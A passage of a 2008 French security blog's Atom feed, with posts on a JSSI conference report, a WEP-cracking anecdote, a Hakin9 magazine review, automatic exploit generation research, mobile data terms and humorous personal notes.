l'Underground).&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-1849470623391854737?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/1849470623391854737/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=1849470623391854737' title='1 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1849470623391854737'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1849470623391854737'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/05/pot-pourri.html' title='Pot pourri'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-1899652108690540780</id><published>2008-05-28T07:00:00.002+02:00</published><updated>2008-05-28T07:00:02.446+02:00</updated><title type='text'>Compte-rendu de la JSSI 2008</title><content type='html'>La Journée Sécurité organisée par l'&lt;a href="http://www.ossir.org/"&gt;OSSIR&lt;/a&gt; (&lt;a href="http://www.ossir.org/jssi/jssi2008/programme.html"&gt;JSSI&lt;/a&gt;) s'est tenue jeudi dernier à Paris.&lt;br /&gt;&lt;br /&gt;Cette année le thème était "Anonymat, vie privée et gestion d'identité". Un sujet qui ne m'évoque absolument rien, d'autant que les conférences étaient plus orientées "santé" que "Web 2.0". J'y allais donc "pour voir".&lt;br /&gt;&lt;br /&gt;Je dois dire que grâce à des intervenants de qualité, je ne me suis pas ennuyé (même si aucun des sujets abordés ne me sera d'une quelconque utilité professionnelle immédiate). Parmi les points mémorables de la journée :&lt;br /&gt;&lt;ul&gt;&lt;li&gt;La plaidoirie de &lt;a href="http://www.alain-bensoussan.com/"&gt;Maitre Bensoussan.&lt;/a&gt;&lt;/li&gt;&lt;li&gt;"Le secret médical, ça commence par ne pas appeler les patients par leur nom dans la salle d'attente".&lt;/li&gt;&lt;li&gt;"Le commercial était chaud comme une baraque à frites" - en parlant du &lt;a href="http://en.wikipedia.org/wiki/Data_Loss_Prevention"&gt;&lt;span style="font-style: italic;"&gt;Data Loss (ou Leak) Prevention&lt;/span&gt;&lt;/a&gt;, le nouveau truc à la mode. Note : contrairement aux IDS, là on est sûr dès le début qu'une solution technique de DLP &lt;a href="http://securitywatch.eweek.com/disaster_planning/hannaford_data_breach_the_security_vendor_conundrum.html"&gt;n'a aucun sens&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;"Dans une omelette au lard, la poule est concernée, mais le cochon est impliqué".&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;J'ai pu également noter au cours de quelques conférences récentes que le système informatique de l'éducation nationale est réellement à la pointe des nouvelles technologies. Par exemple :&lt;br /&gt;&lt;ul&gt;&lt;li&gt;VPN IPSEC site à site entre des milliers de sites, certains à travers des liaisons lentes et peu fiables (ex. Saint Pierre et Miquelon).&lt;/li&gt;&lt;li&gt;Hébergement de milliers de sites utilisateurs, non administrés et souvent écrits en PHP, avec 1,5 million de &lt;span style="font-style: italic;"&gt;hits&lt;/span&gt; par jour.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;&lt;a style="font-style: italic;" href="http://www.eduroam.org/"&gt;Roaming WiFi&lt;/a&gt; à l'échelle mondiale.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://federation.cru.fr/"&gt;Fédération d'identité&lt;/a&gt; à une échelle trans-nationale.&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;Ca laisse rêveur quand on voit la complexité du déploiement d'un &lt;span style="font-style: italic;"&gt;WiFi Guest&lt;/span&gt; dans la plupart des grandes entreprises françaises ...&lt;br /&gt;&lt;br /&gt;Le clou de la journée reste quand même le réseau WiFi du site (je ne parle pas du &lt;span style="font-style: italic;"&gt;hotspot&lt;/span&gt; Orange, mais bien du SSID local, probablement à usage privé).&lt;br /&gt;&lt;br /&gt;Constatant une performance anormalement basse sur la bande WiFi, je suspecte tout d'abord un &lt;a href="http://sid.rstack.org/blog/index.php/268-achete-un-fil"&gt;problème radio&lt;/a&gt; ou un &lt;a href="http://www.hsc.fr/ressources/outils/dns2tcp/"&gt;abus de ressources&lt;/a&gt;. Après un rapide &lt;span style="font-style: italic;"&gt;monitoring&lt;/span&gt; du trafic ambiant, il n'en est rien : la cause du problème est une émission massive (plusieurs centaines par seconde) de requêtes ARP (identifiables par leur taille) sur le réseau local protégé en ... WEP.&lt;br /&gt;&lt;br /&gt;Cette consommation de bande passante durant au-delà du raisonnable (plusieurs heures !), je fais le tour des rares personnes ayant un &lt;span style="font-style: italic;"&gt;laptop&lt;/span&gt; sur les genoux (on n'est pas au SSTIC), puis je filtre sur le critère &lt;span style="font-style: italic;"&gt;laptop sous Linux&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;Le coupable est identifié : c'est un consultant travaillant dans une société réputée en matière de sécurité WiFi (elle est passée sur TF1, c'est dire). Non seulement ce consultant n'utilise pas &lt;a href="http://www.aircrack-ng.org/doku.php"&gt;AirCrack&lt;/a&gt; en mode &lt;a href="http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/"&gt;-ptw&lt;/a&gt;, mais surtout ... il n'a jamais trouvé que la clé WEP ne faisait que 64 bits !&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-1899652108690540780?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/1899652108690540780/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=1899652108690540780' title='7 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1899652108690540780'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1899652108690540780'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/05/compte-rendu-de-la-jssi-2008.html' title='Compte-rendu de la JSSI 2008'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-2422140913323766333</id><published>2008-05-25T22:47:00.003+02:00</published><updated>2008-05-25T23:04:46.056+02:00</updated><title type='text'>Annonce légale</title><content type='html'>Je connais quelqu'un qui vend une place pour SSTIC'08, toutes options, état neuf, prix coûtant. Donc n'hésitez pas à me contacter par mail ou dans les commentaires : premier arrivé, premier servi.&lt;br /&gt;&lt;br /&gt;PS#0 Cet article de Réseaux et Télécoms m'a bien fait rire :&lt;br /&gt;&lt;a href="http://securite.reseaux-telecoms.net/actualites/lire-certification-27001-les-rssi-de-grands-groupes-disent-non-merci-18153-page-1.html"&gt;Certification 27001 : Les RSSI de grands groupes disent non merci !&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;PS#1 Je suis toujours fasciné par cette bannière publicitaire qui tourne sur le site de &lt;a href="http://secuobs.com/"&gt;SecuObs&lt;/a&gt; depuis quelques mois :&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Who needs VPN4U Services ? Hotspot Wireless Users at risk of having &lt;/span&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;personal datas stolen like passwords&lt;/span&gt;&lt;span style="font-style: italic;"&gt; ! Home Internet Users, Cable and DSL providers &lt;/span&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;don't filtering exploits&lt;/span&gt;&lt;span style="font-style: italic;"&gt; ! International Internet Users living where Governments prevent users from enjoying Internet, &lt;/span&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;USA IP = no controls&lt;/span&gt;&lt;span style="font-style: italic;"&gt; ! 36 USD/year&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;PS#2 Je vous laisse savourer cette perle sur l'&lt;span style="font-style: italic;"&gt;underground&lt;/span&gt; (un sujet &lt;a href="http://www.mindkind.org/"&gt;à la mode&lt;/a&gt; en ce moment), lue dans le Hacker News Magazine de novembre dernier. Notez bien qu'il n'est pas question de Paradis du Fruit :)&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/hnm0.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/blog/hnm0.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/hnm1.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/blog/hnm1.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-2422140913323766333?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/2422140913323766333/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=2422140913323766333' title='5 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/2422140913323766333'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/2422140913323766333'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/05/annonce-lgale.html' title='Annonce légale'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-1745879313234609248</id><published>2008-05-19T07:00:00.000+02:00</published><updated>2008-05-19T07:00:01.746+02:00</updated><title type='text'>"Sans la liberté de blâmer, il n'est point d'éloge flatteur"</title><content type='html'>Pas beaucoup d'activité sur ce blog en ce moment, c'est probablement signe que je prépare activement ma &lt;span style="font-style: italic;"&gt;rump session&lt;/span&gt; du &lt;a href="http://www.sstic.org/SSTIC08/info.do"&gt;SSTIC&lt;/a&gt; [*]&lt;br /&gt;&lt;br /&gt;Mais j'ai quand même pris le temps de lire la presse sécurité bi-mensuelle ce week-end. Et il faut bien l'admettre : le &lt;a href="http://fr.hakin9.org/prt/view/nos-numers/issue/823.html"&gt;dernier Hakin9&lt;/a&gt; est ... pas mal du tout !&lt;br /&gt;&lt;br /&gt;Qu'est-ce qui a changé ? Tout ! (Y compris la mise en page d'ailleurs)&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Les auteurs sont de langue française, c'est donc la fin des traductions hasardeuses.&lt;/li&gt;&lt;li&gt;Les auteurs sont des professionnels, ayant travaillé dans le domaine dont ils parlent. Les articles sont structurés et apportent une vraie valeur ajoutée (fini les articles d'étudiants découvrant l'injection de DLL).&lt;/li&gt;&lt;li&gt;Les fautes de style, d'orthographe et de grammaire sont beaucoup moins nombreuses. Ca n'est probablement pas le fait du comité de relecture (en tout cas il ne semblait pas y en avoir dans les précédents numéros), mais plutôt de la qualité intrinsèque des auteurs.&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;La seule chose qui subsiste, ce sont les publicités kitsch :)&lt;br /&gt;&lt;br /&gt;Sur le fond, voici une revue de quelques articles phares :&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Sécurité Oracle, par un formateur Oracle ayant travaillé plusieurs années dans cette même société. Avec des techniques (telles que l'exploration des tables v$*) qui donnent envie de lire un dossier sur la sécurité des bases de données dans &lt;a href="http://www.miscmag.com/"&gt;MISC&lt;/a&gt; (le serpent de mer ...).&lt;/li&gt;&lt;li&gt;Sécurité MySQL, par un hébergeur. Plutôt orienté configuration donc, mais techniquement valable.&lt;/li&gt;&lt;li&gt;Fuite d'information &lt;span style="font-style: italic;"&gt;via&lt;/span&gt; un ordinateur portable volé, un sujet &lt;a href="http://esec.fr.sogeti.com/seminaire/index.php#forensics"&gt;à la mode&lt;/a&gt; qui fera plaisir à l'inventeur de l'&lt;a href="http://nonop.wordpress.com/"&gt;&lt;span style="font-style: italic;"&gt;offensics&lt;/span&gt;&lt;/a&gt;. Note : l'article est disponible en ligne sur le site de Hakin9 sous forme PDF.&lt;/li&gt;&lt;li&gt;Sécurité BlueTooth, avec des vraies captures d'écran du "fameux" logiciel &lt;a href="http://www.fte.com/products/FTS4BT-01.asp"&gt;FTS4BT&lt;/a&gt;. Ca prouve que l'auteur est au fait des dernières attaques, mais à $10,000 la licence on peut quand même se poser des questions sur la provenance de ces &lt;span style="font-style: italic;"&gt;screenshots&lt;/span&gt; ;)&lt;/li&gt;&lt;/ul&gt;PS. Bon anniversaire à mon droïde préféré, à savoir :&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/serpi.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 200px;" src="http://newsoft.dyndns.org/blog/serpi.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[*] Ou la présentation de &lt;a href="http://sandman.msuiche.net/"&gt;SandMan&lt;/a&gt; à &lt;a href="http://blackhat.com/html/bh-usa-08/bh-usa-08-schedule.html"&gt;BlackHat US 2008&lt;/a&gt;. Il n'y a qu'en Europe où vous n'aurez pas le droit à cette conférence, pour une raison indépendante de ma volonté ;)&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-1745879313234609248?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/1745879313234609248/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=1745879313234609248' title='10 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1745879313234609248'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1745879313234609248'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/05/sans-la-libert-de-blmer-il-nest-point.html' title='&quot;Sans la liberté de blâmer, il n&apos;est point d&apos;éloge flatteur&quot;'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>10</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-6997007700273413530</id><published>2008-05-18T21:34:00.002+02:00</published><updated>2008-05-18T21:49:56.430+02:00</updated><title type='text'>Comment passer une soirée réussie ?</title><content type='html'>L'expérience de ce week-end prouve qu'il faut respecter plusieurs critères simples, mais complètement contre-intuitifs. En voici donc la primeur :&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Ne rien tenter d'organiser. Celui qui organise essaie de trouver une date qui plaise à tout le monde, en général la seule où il n'est &lt;a href="http://www.acklabs.net/blog/?p=372"&gt;pas dispo&lt;/a&gt;.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Prévenir les gens 2h avant la soirée, afin qu'ils ne puissent pas invoquer des prétextes fallacieux tels que "j'ai &lt;span style="font-style: italic;"&gt;peut-être&lt;/span&gt; escalade".&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Ne pas tenter s'alimenter, sinon l'épineux &lt;a href="http://sid.rstack.org/blog/index.php/150-de-la-factorisation-des-pizzas"&gt;problème du choix&lt;/a&gt; va se poser. De toute façon, dans la bière, il y a à boire et à manger.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Ne donner aucune consigne stressante pour les invités, du type "apportez à manger pour un nombre de personnes compris entre 3 et 20". Statistiquement, il y aura alors 50% bière et 50% vodka, ce qui est parfait (la nature est bien faite).&lt;/li&gt;&lt;li&gt;Ne pas inviter de jeunes. Ils boivent du Coca &lt;span style="font-style: italic;"&gt;avec sucre.&lt;/span&gt; &lt;/li&gt;&lt;li&gt;Ne pas inviter &lt;a href="http://www.mindkind.org/index.php?entry=entry080504-163010"&gt;&lt;span style="font-style: italic;"&gt;l'underground&lt;/span&gt;&lt;/a&gt;. Comme ils n'ont pas de sous, ils font leurs courses chez Leader Price.&lt;/li&gt;&lt;li&gt;Ne pas épuiser les sujets Debian et LatexBeamer avant la fin de la première bouteille de vodka.&lt;br /&gt;&lt;/li&gt;&lt;/ol&gt;Attention ces critères n'ont été testés que sur des individus reconnus &lt;span style="font-style: italic;"&gt;geeks&lt;/span&gt; incurables. Je décline toute responsabilité en cas d'utilisation sur un public moins averti.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-6997007700273413530?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/6997007700273413530/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=6997007700273413530' title='10 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/6997007700273413530'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/6997007700273413530'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/05/comment-passer-une-soire-russie.html' title='Comment passer une soirée réussie ?'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>10</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-7612949156563298068</id><published>2008-04-20T20:07:00.003+02:00</published><updated>2008-04-20T21:04:28.291+02:00</updated><title type='text'>Special K.</title><content type='html'>Je dédie &lt;a href="http://www.cs.cmu.edu/%7Edbrumley/pubs/apeg.pdf"&gt;ce papier&lt;/a&gt; à un franco-américain bien connu dans le monde de la sécurité.&lt;br /&gt;&lt;br /&gt;Pour faire court, il a été résumé &lt;a href="http://isc.sans.org/diary.html?storyid=4310"&gt;ici&lt;/a&gt; par le SANS.&lt;br /&gt;&lt;br /&gt;Pour faire encore plus court (et en français), les auteurs prétendent avoir créé un outil qui fabrique automatiquement, à partir des patches Microsoft, un exploit (quasiment) fonctionnel, le tout en 3 minutes.&lt;br /&gt;&lt;br /&gt;Alors, FUD ou réalité d'après vous ? ;)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;PS. J'ai quand même l'impression qu'on croûle sous les "papiers" ces derniers temps ... Un effet de bord du regain d'intérêt des &lt;a href="http://sid.rstack.org/blog/index.php/260-ta-memoire-dans-mon-pot#c3730"&gt;universitaires&lt;/a&gt; pour la sécurité ?&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-7612949156563298068?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/7612949156563298068/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=7612949156563298068' title='6 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/7612949156563298068'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/7612949156563298068'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/04/special-k.html' title='Special K.'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-5554817373634418774</id><published>2008-04-19T10:00:00.000+02:00</published><updated>2008-04-19T10:29:35.771+02:00</updated><title type='text'>Toujours aussi illimité ...</title><content type='html'>Il faut vraiment faire attention aux conditions d'utilisation de la fameuse "3G" dont on nous rebat les oreilles, car elles changent souvent :&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/eee.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/blog/eee.jpg" alt="" border="0" /&gt;&lt;/a&gt;Pour ceux qui n'ont pas le courage de lire :&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;(5) [...] Afin de permettre à tous les abonnés d'accéder à Internet dans des conditions optimales, le réseau 3G/3G+ étant mutualisé, le débit maximum de connexion sera ajusté à 128Kb/s au-delà de 1Go d'échange de données par mois, jusqu'à la prochaine date de facturation.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Ah oui j'oubliais :&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/cle3G.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/blog/cle3G.jpg" alt="" border="0" /&gt;&lt;/a&gt;100% compatible ? Je ne vais pas faire le malin avec OpenBSD ... il suffit de savoir que les clés écoulées jusqu'au début de cette année n'étaient &lt;a href="http://www.commentcamarche.net/forum/affich-3716379-cle-usb-3g-de-chez-sfr"&gt;pas compatibles Vista&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Tout cela vous semble moisi ? Et bien ils ne s'en cachent même plus maintenant :)&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/arnac.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/blog/arnac.jpg" alt="" border="0" /&gt;&lt;/a&gt;PS. Juste pour le troll, le prochain Asus EEE sera proposé sous &lt;a href="http://www.computerworld.com/action/article.do?command=viewArticleBasic&amp;amp;articleId=9078200"&gt;Windows XP&lt;/a&gt; :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-5554817373634418774?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/5554817373634418774/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=5554817373634418774' title='1 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/5554817373634418774'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/5554817373634418774'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/03/toujours-aussi-illimit-pret.html' title='Toujours aussi illimité ...'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-6301750906692905834</id><published>2008-04-04T21:47:00.001+02:00</published><updated>2008-04-04T22:25:56.814+02:00</updated><title type='text'>De l'utilisation intelligente du "grey listing"</title><content type='html'>C'est probablement la saison qui veut ça (avec l'approche des impôts), mais les &lt;span style="font-style: italic;"&gt;call centers&lt;/span&gt; se déchainent en ce moment.&lt;br /&gt;&lt;br /&gt;Inspiré par l'efficacité du &lt;a href="http://fr.wikipedia.org/wiki/Greylisting"&gt;&lt;span style="font-style: italic;"&gt;greylisting&lt;/span&gt;&lt;/a&gt; pour lutter contre le spam courriel, j'ai décidé de le mettre en place dans ma vie de tous les jours également (même si cela risque de me rapporter moult points au&lt;a style="font-style: italic;" href="http://www.innergeek.us/francais.html"&gt; geek test&lt;/a&gt;).&lt;br /&gt;&lt;br /&gt;Donc je ne réponds plus au téléphone dès le premier appel : si c'est vraiment important, les correspondants rappellent immédiatement ou laissent un message.&lt;br /&gt;&lt;br /&gt;Je n'ouvre plus ma porte non plus. Si quelqu'un sait que je suis là (par exemple parce que je lui ai donné rendez-vous), il appelle sur le portable ou sonne une deuxième fois.&lt;br /&gt;&lt;br /&gt;Le seul problème : certains &lt;span style="font-style: italic;"&gt;call centers&lt;/span&gt; appellent même au bureau désormais ! Parfois l'interlocuteur dispose d'informations qui laissent vaguement supposer d'où il tire son listing de contacts, mais j'en suis resté là pour le moment.&lt;br /&gt;&lt;br /&gt;Il ne me reste plus qu'à militer pour faire ajouter à la charte sécurité de l'entreprise l'interdiction de décrocher son téléphone s'il n'a pas déjà sonné dans les 2 minutes précédentes - ce qui finalement est largement aussi justifiable que l'interdiction d'introduire des appareils photos encore affichée à l'entrée de nombreux sites industriels ...&lt;br /&gt;&lt;br /&gt;Mais tout n'est pas si noir : le spam (courriel ou téléphonique) permet de s'assurer périodiquement que l'infrastructure de communication continue à fonctionner. C'est le &lt;a href="http://www.nagios.org/"&gt;Nagios&lt;/a&gt;^H^H^H&lt;a href="http://www.microsoft.com/systemcenter/"&gt;Microsoft System Center&lt;/a&gt; du pauvre en quelque sorte !&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-6301750906692905834?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/6301750906692905834/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=6301750906692905834' title='3 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/6301750906692905834'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/6301750906692905834'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/04/de-lutilisation-intelligente-du-grey.html' title='De l&apos;utilisation intelligente du &quot;grey listing&quot;'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-221302539150944943</id><published>2008-03-28T19:20:00.003+01:00</published><updated>2008-03-28T19:23:51.575+01:00</updated><title type='text'>Cherchez l'erreur</title><content type='html'>Pour se détendre avant le week-end :)&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/erreur.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/blog/erreur.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-221302539150944943?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/221302539150944943/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=221302539150944943' title='4 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/221302539150944943'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/221302539150944943'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/03/cherchez-lerreur.html' title='Cherchez l&apos;erreur'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-5371698711914497633</id><published>2008-03-20T20:52:00.002+01:00</published><updated>2008-03-20T21:22:08.187+01:00</updated><title type='text'>Rendez moi mon écran bleu</title><content type='html'>&lt;span style="font-style: italic;"&gt;(Suite du précédent message, toujours à propos de l'Asus EEE).&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Voici une aventure à double sens.&lt;br /&gt;&lt;br /&gt;J'essaie de me connecter à mon réseau WiFi en WPA-PSK via l'utilitaire de configuration graphique. Mon réseau est protégé par une &lt;span style="font-style: italic;"&gt;passphrase&lt;/span&gt; suffisament longue, &lt;a href="http://openciphers.sourceforge.net/oc/wpa.php"&gt;comme il se 